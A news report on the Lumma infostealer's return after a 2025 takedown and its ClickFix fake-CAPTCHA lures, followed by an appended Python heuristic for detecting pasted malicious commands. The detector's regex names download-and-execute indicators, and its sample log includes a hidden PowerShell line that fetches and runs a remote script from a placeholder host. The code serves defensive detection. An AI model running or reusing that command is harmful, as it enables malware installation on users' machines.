
Previously-hobbled Lumma Stealer has returned with lures that are hard to resist


In May, law enforcement agencies worldwide claimed a significant win after disrupting the infrastructure behind Lumma, an infostealer that had compromised almost 395,000 Windows machines in the two months leading up to the coordinated action. On Wednesday, researchers reported that Lumma has resurfaced “at scale” in hard-to-detect campaigns that harvest credentials and sensitive documents.

Lumma, often called Lumma Stealer, first surfaced on Russian-language cybercrime forums in 2022. Its cloud-hosted malware-as-a-service setup supplied an extensive network of domains used for lure sites offering cracked apps, games, and pirated films, along with command-and-control channels and the other components threat actors need to operate an infostealing service. Within a year, premium versions were advertised for up to $2,500. By spring 2024, the FBI found more than 21,000 forum listings. Microsoft later described Lumma as the “go-to tool” for several criminal groups, including the prolific Scattered Spider.

Takedowns are hard

The FBI and an international coalition of its counterparts took action early last year. In May they reported seizing some 2,300 domains, command-and-control nodes, and marketplaces that had supported the infostealer. Despite that effort, the malware has since reemerged and is infecting a notable number of systems again.

“LummaStealer is back at scale, despite a major 2025 law-enforcement takedown that disrupted thousands of its command-and-control domains,” researchers from security firm Bitdefender wrote. “The operation has rapidly rebuilt its infrastructure and continues to spread worldwide.”

As before, the recent uptick relies heavily on a social-engineering trick dubbed “ClickFix,” which has proven alarmingly effective at getting users to infect their own machines. These lures typically masquerade as fake CAPTCHAs that — rather than asking users to tick a box or identify elements in a scrambled image — prompt them to copy a piece of text and paste it into an input field, a step that takes only seconds. The pasted text contains malicious commands posing as the CAPTCHA challenge, and the input field is the Windows terminal. Victims who follow the instructions install a loader, which then deploys Lumma.
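The self-infection pattern described above leaves a recognisable trace in endpoint telemetry: a command interpreter started from a user-facing parent whose command line goes out to fetch something. The following is an added detection example, not code from the article or from Bitdefender; the JSON field names, the parent-process list and the sample events are all assumptions constructed for this illustration.

```python
"""Heuristic for ClickFix-style self-infection over process-creation events.
Assumes telemetry (e.g. Sysmon Event ID 1) has been normalised to one JSON
object per line with Image, ParentImage and CommandLine fields (assumption)."""
import json
import re

# Interpreters a ClickFix lure typically tells the victim to paste into.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
# Parents that indicate a human typed/pasted the command (assumed list):
# explorer.exe covers the Run dialog, windowsterminal.exe the terminal app.
USER_PARENTS = {"explorer.exe", "windowsterminal.exe"}
# Command-line fragments suggesting the pasted text fetches and runs a loader.
INDICATORS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|frombase64string|"
    r"\bcurl\b|\bmshta\b|\bhttps?://|-enc(odedcommand)?\b",
    re.IGNORECASE,
)

def score_event(ev: dict) -> list:
    """Return the reasons an event looks like a pasted ClickFix command."""
    reasons = []
    image = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if image in SHELLS and parent in USER_PARENTS:
        reasons.append(f"{image} launched interactively from {parent}")
        if INDICATORS.search(ev.get("CommandLine", "")):
            reasons.append("command line contains a download/execute indicator")
    return reasons

def scan(lines):
    """Flag only events carrying both the parent signal and the content signal."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        reasons = score_event(ev)
        if len(reasons) >= 2:
            hits.append((ev["CommandLine"], reasons))
    return hits

# Constructed sample telemetry (not real captured data). Line 1 is the ClickFix
# shape; line 2 is a user opening cmd normally; line 3 is a service-launched
# download with no interactive parent. Only line 1 should be flagged.
SAMPLE_LOG = r"""
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iwr http://example.invalid/lure.txt | iex\""}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd /c dir"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "powershell -c \"iwr http://updates.example.invalid/manifest.json\""}
"""

if __name__ == "__main__":
    for cmd, why in scan(SAMPLE_LOG.splitlines()):
        print("SUSPECT:", cmd, "|", "; ".join(why))
```

Requiring both signals keeps ordinary interactive shell use and scheduled or service-driven downloads out of the alert queue; tune the parent list to the launchers your environment actually exposes to users.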
